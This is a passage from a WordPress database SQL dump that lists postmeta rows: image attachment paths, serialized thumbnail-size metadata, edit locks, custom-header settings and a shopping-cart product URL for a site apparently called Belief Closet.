'a:5:{s:5:"width";i:520;s:6:"height";i:307;s:4:"file";s:17:"2014/02/sess4.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:17:"sess4-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:17:"sess4-300x177.jpg";s:5:"width";i:300;s:6:"height";i:177;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:17:"sess4-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:17:"sess4-400x307.jpg";s:5:"width";i:400;s:6:"height";i:307;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:17:"sess4-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(504, 313, '_wp_attached_file', '2014/02/sess5.jpg'),
(505, 313, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:453;s:6:"height";i:302;s:4:"file";s:17:"2014/02/sess5.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:17:"sess5-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:17:"sess5-300x200.jpg";s:5:"width";i:300;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:17:"sess5-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:17:"sess5-400x302.jpg";s:5:"width";i:400;s:6:"height";i:302;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:17:"sess5-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(506, 314, '_wp_attached_file', '2014/02/sess6.jpg'),
(507, 314, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:270;s:6:"height";i:180;s:4:"file";s:17:"2014/02/sess6.jpg";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:17:"sess6-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:17:"sess6-220x180.jpg";s:5:"width";i:220;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:17:"sess6-170x180.jpg";s:5:"width";i:170;s:6:"height";i:180;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(508, 315, '_wp_attached_file', '2014/02/shift.jpg'),
(509, 315, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:400;s:6:"height";i:400;s:4:"file";s:17:"2014/02/shift.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:17:"shift-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:17:"shift-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:17:"shift-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:17:"shift-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:17:"shift-400x372.jpg";s:5:"width";i:400;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(510, 316, '_wp_attached_file', '2014/02/simply.jpg');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(511, 316, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:320;s:6:"height";i:320;s:4:"file";s:18:"2014/02/simply.jpg";s:5:"sizes";a:4:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"simply-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"simply-300x300.jpg";s:5:"width";i:300;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:18:"simply-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:18:"simply-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(512, 317, '_wp_attached_file', '2014/02/stone-doorway.jpg'),
(513, 317, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:345;s:6:"height";i:470;s:4:"file";s:25:"2014/02/stone-doorway.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"stone-doorway-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"stone-doorway-220x300.jpg";s:5:"width";i:220;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:25:"stone-doorway-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:25:"stone-doorway-345x400.jpg";s:5:"width";i:345;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:25:"stone-doorway-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:25:"stone-doorway-345x372.jpg";s:5:"width";i:345;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(514, 318, '_wp_attached_file', '2014/02/support.jpg'),
(515, 318, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:418;s:6:"height";i:354;s:4:"file";s:19:"2014/02/support.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"support-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"support-300x254.jpg";s:5:"width";i:300;s:6:"height";i:254;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:19:"support-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:19:"support-400x354.jpg";s:5:"width";i:400;s:6:"height";i:354;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:19:"support-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(539, 396, '_wp_attached_file', '2014/04/bon3.jpg'),
(540, 396, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:269;s:6:"height";i:241;s:4:"file";s:16:"2014/04/bon3.jpg";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:16:"bon3-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:16:"bon3-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:16:"bon3-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(541, 179, '_edit_lock', '1515179459:2'),
(542, 170, '_edit_lock', '1475534895:2'),
(543, 174, '_edit_lock', '1403138503:2'),
(545, 430, '_wp_attached_file', '2014/04/TYB-final-Cover.pdf'),
(546, 432, '_wp_attached_file', '2014/04/9165089.jpg'),
(547, 433, '_wp_attached_file', '2014/04/TYB-Cover.jpg'),
(549, 475, '_wp_attached_file', '2014/04/creating-on-purpose.jpg'),
(550, 475, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:400;s:6:"height";i:407;s:4:"file";s:31:"2014/04/creating-on-purpose.jpg";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"creating-on-purpose-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"creating-on-purpose-294x300.jpg";s:5:"width";i:294;s:6:"height";i:300;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:31:"creating-on-purpose-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:31:"creating-on-purpose-400x400.jpg";s:5:"width";i:400;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:31:"creating-on-purpose-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:31:"creating-on-purpose-400x372.jpg";s:5:"width";i:400;s:6:"height";i:372;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(551, 488, '_wp_attached_file', '2014/05/index_bg1.jpg'),
(552, 488, '_wp_attachment_context', 'custom-header'),
(553, 488, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1260;s:6:"height";i:150;s:4:"file";s:21:"2014/05/index_bg1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"index_bg1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:20:"index_bg1-300x35.jpg";s:5:"width";i:300;s:6:"height";i:35;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"index_bg1-1024x121.jpg";s:5:"width";i:1024;s:6:"height";i:121;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:21:"index_bg1-220x150.jpg";s:5:"width";i:220;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:21:"index_bg1-400x150.jpg";s:5:"width";i:400;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:21:"index_bg1-170x150.jpg";s:5:"width";i:170;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:21:"index_bg1-672x150.jpg";s:5:"width";i:672;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:22:"index_bg1-1038x150.jpg";s:5:"width";i:1038;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(554, 488, '_wp_attachment_is_custom_header', 'clearyourbeliefs'),
(555, 490, '_wp_attached_file', '2014/04/lion-signature-300x70.png'),
(556, 490, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:300;s:6:"height";i:70;s:4:"file";s:33:"2014/04/lion-signature-300x70.png";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:32:"lion-signature-300x70-150x70.png";s:5:"width";i:150;s:6:"height";i:70;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:32:"lion-signature-300x70-220x70.png";s:5:"width";i:220;s:6:"height";i:70;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:32:"lion-signature-300x70-170x70.png";s:5:"width";i:170;s:6:"height";i:70;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(627, 546, '_wp_attached_file', '2014/05/cropped-beliefCloset_icon_PRINT_wh.jpg'),
(628, 546, '_wp_attachment_context', 'custom-header'),
(629, 546, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1260;s:6:"height";i:240;s:4:"file";s:46:"2014/05/cropped-beliefCloset_icon_PRINT_wh.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:46:"cropped-beliefCloset_icon_PRINT_wh-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:45:"cropped-beliefCloset_icon_PRINT_wh-300x57.jpg";s:5:"width";i:300;s:6:"height";i:57;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:47:"cropped-beliefCloset_icon_PRINT_wh-1024x195.jpg";s:5:"width";i:1024;s:6:"height";i:195;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:46:"cropped-beliefCloset_icon_PRINT_wh-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:46:"cropped-beliefCloset_icon_PRINT_wh-400x240.jpg";s:5:"width";i:400;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:46:"cropped-beliefCloset_icon_PRINT_wh-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:46:"cropped-beliefCloset_icon_PRINT_wh-672x240.jpg";s:5:"width";i:672;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:47:"cropped-beliefCloset_icon_PRINT_wh-1038x240.jpg";s:5:"width";i:1038;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(630, 546, '_wp_attachment_is_custom_header', 'clearyourbeliefs'),
(631, 547, '_wp_attached_file', '2014/05/cropped-header-bg.jpg'),
(632, 547, '_wp_attachment_context', 'custom-header'),
(633, 547, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1260;s:6:"height";i:240;s:4:"file";s:29:"2014/05/cropped-header-bg.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:29:"cropped-header-bg-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:28:"cropped-header-bg-300x57.jpg";s:5:"width";i:300;s:6:"height";i:57;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:30:"cropped-header-bg-1024x195.jpg";s:5:"width";i:1024;s:6:"height";i:195;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:29:"cropped-header-bg-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:29:"cropped-header-bg-400x240.jpg";s:5:"width";i:400;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:29:"cropped-header-bg-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:29:"cropped-header-bg-672x240.jpg";s:5:"width";i:672;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:30:"cropped-header-bg-1038x240.jpg";s:5:"width";i:1038;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(634, 547, '_wp_attachment_is_custom_header', 'clearyourbeliefs'),
(635, 551, '_wp_attached_file', '2014/05/cropped-header-bg1.jpg'),
(636, 551, '_wp_attachment_context', 'custom-header'),
(637, 551, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:1260;s:6:"height";i:240;s:4:"file";s:30:"2014/05/cropped-header-bg1.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:30:"cropped-header-bg1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:29:"cropped-header-bg1-300x57.jpg";s:5:"width";i:300;s:6:"height";i:57;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:31:"cropped-header-bg1-1024x195.jpg";s:5:"width";i:1024;s:6:"height";i:195;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:30:"cropped-header-bg1-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:30:"cropped-header-bg1-400x240.jpg";s:5:"width";i:400;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:30:"cropped-header-bg1-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:14:"post-thumbnail";a:4:{s:4:"file";s:30:"cropped-header-bg1-672x240.jpg";s:5:"width";i:672;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}s:25:"twentyfourteen-full-width";a:4:{s:4:"file";s:31:"cropped-header-bg1-1038x240.jpg";s:5:"width";i:1038;s:6:"height";i:240;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(638, 551, '_wp_attachment_is_custom_header', 'clearyourbeliefs'),
(650, 96, 'ISURL', 'https://beliefcloset.infusionsoft.com/app/manageCart/addProduct?productId=33'),
(651, 588, '_edit_lock', '1484273876:2'),
(652, 588, '_edit_last', '2'),
(653, 588, '_wp_page_template', 'default'),
(654, 590, '_edit_last', '1'),
(655, 590, '_edit_lock', '1400278957:1'),
(656, 590, '_wp_page_template', 'default'),
(673, 716, '_edit_last', '1'),
(665, 681, '_wp_attached_file', '2014/06/shutterstock_67060984.jpg'),
(666, 682, '_wp_attached_file', '2014/06/shutterstock_173538659.jpg'),
(667, 683, '_wp_attached_file', '2014/06/shutterstock_93378286.jpg'),
(668, 684, '_wp_attached_file', '2014/06/shutterstock_76794007.jpg'),
(669, 702, '_wp_attached_file', '2014/06/15dayguar.jpg'),
(670, 702, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:581;s:6:"height";i:255;s:4:"file";s:21:"2014/06/15dayguar.jpg";s:5:"sizes";a:5:{s:9:"thumbnail";a:4:{s:4:"file";s:21:"15dayguar-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:21:"15dayguar-300x131.jpg";s:5:"width";i:300;s:6:"height";i:131;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:21:"15dayguar-220x220.jpg";s:5:"width";i:220;s:6:"height";i:220;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-display";a:4:{s:4:"file";s:21:"15dayguar-400x255.jpg";s:5:"width";i:400;s:6:"height";i:255;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:21:"15dayguar-170x200.jpg";s:5:"width";i:170;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(674, 716, '_wp_page_template', 'default'),
(675, 716, '_edit_lock', '1402595125:1'),
(676, 738, '_wp_attached_file', '2014/06/divider.jpg'),
(677, 738, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:265;s:6:"height";i:17;s:4:"file";s:19:"2014/06/divider.jpg";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"divider-150x17.jpg";s:5:"width";i:150;s:6:"height";i:17;s:9:"mime-type";s:10:"image/jpeg";}s:14:"category-thumb";a:4:{s:4:"file";s:18:"divider-220x17.jpg";s:5:"width";i:220;s:6:"height";i:17;s:9:"mime-type";s:10:"image/jpeg";}s:15:"product-preview";a:4:{s:4:"file";s:18:"divider-170x17.jpg";s:5:"width";i:170;s:6:"height";i:17;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(678, 741, '_wp_attached_file', '2014/06/divider.gif'),
(679, 741, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:265;s:6:"height";i:17;s:4:"file";s:19:"2014/06/divider.gif";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"divider-150x17.gif";s:5:"width";i:150;s:6:"height";i:17;s:9:"mime-type";s:9:"image/gif";}s:14:"category-thumb";a:4:{s:4:"file";s:18:"divider-220x17.gif";s:5:"width";i:220;s:6:"height";i:17;s:9:"mime-type";s:9:"image/gif";}s:15:"product-preview";a:4:{s:4:"file";s:18:"divider-170x17.gif";s:5:"width";i:170;s:6:"height";i:17;s:9:"mime-type";s:9:"image/gif";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(680, 746, '_wp_attached_file', '2014/06/divider1.gif'),
(681, 746, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:265;s:6:"height";i:17;s:4:"file";s:20:"2014/06/divider1.gif";s:5:"sizes";a:3:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"divider1-150x17.gif";s:5:"width";i:150;s:6:"height";i:17;s:9:"mime-type";s:9:"image/gif";}s:14:"category-thumb";a:4:{s:4:"file";s:19:"divider1-220x17.gif";s:5:"width";i:220;s:6:"height";i:17;s:9:"mime-type";s:9:"image/gif";}s:15:"product-preview";a:4:{s:4:"file";s:19:"divider1-170x17.gif";s:5:"width";i:170;s:6:"height";i:17;s:9:"mime-type";s:9:"image/gif";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(682, 747, '_wp_attached_file', '2014/06/line.png'),
(683, 747, '_wp_attachment_metadata', 'a:5:{s:5:"width";i:870;s:6:"height";i:41;s:4:"file";s:16:"2014/06/line.png";s:5:"sizes";a:6:{s:9:"thumbnail";a:4:{s:4:"file";s:15:"line-150x41.png";s:5:"width";i:150;s:6:"height";i:41;s:9:"mime-type";s:9:"image/png";}s:6:"medium";a:4:{s:4:"file";s:15:"line-300x14.png";s:5:"width";i:300;s:6:"height";i:14;s:9:"mime-type";s:9:"image/png";}s:14:"category-thumb";a:4:{s:4:"file";s:15:"line-220x41.png";s:5:"width";i:220;s:6:"height";i:41;s:9:"mime-type";s:9:"image/png";}s:15:"product-display";a:4:{s:4:"file";s:15:"line-400x41.png";s:5:"width";i:400;s:6:"height";i:41;s:9:"mime-type";s:9:"image/png";}s:15:"product-preview";a:4:{s:4:"file";s:15:"line-170x41.png";s:5:"width";i:170;s:6:"height";i:41;s:9:"mime-type";s:9:"image/png";}s:14:"post-thumbnail";a:4:{s:4:"file";s:15:"line-672x41.png";s:5:"width";i:672;s:6:"height";i:41;s:9:"mime-type";s:9:"image/png";}}s:10:"image_meta";a:10:{s:8:"aperture";i:0;s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";i:0;s:9:"copyright";s:0:"";s:12:"focal_length";i:0;s:3:"iso";i:0;s:13:"shutter_speed";i:0;s:5:"title";s:0:"";}}'),
(684, 755, '_wp_attached_file', '2014/06/shell.jpg'),
(685, 756, '_wp_attached_file', '2014/06/shell1.jpg'),
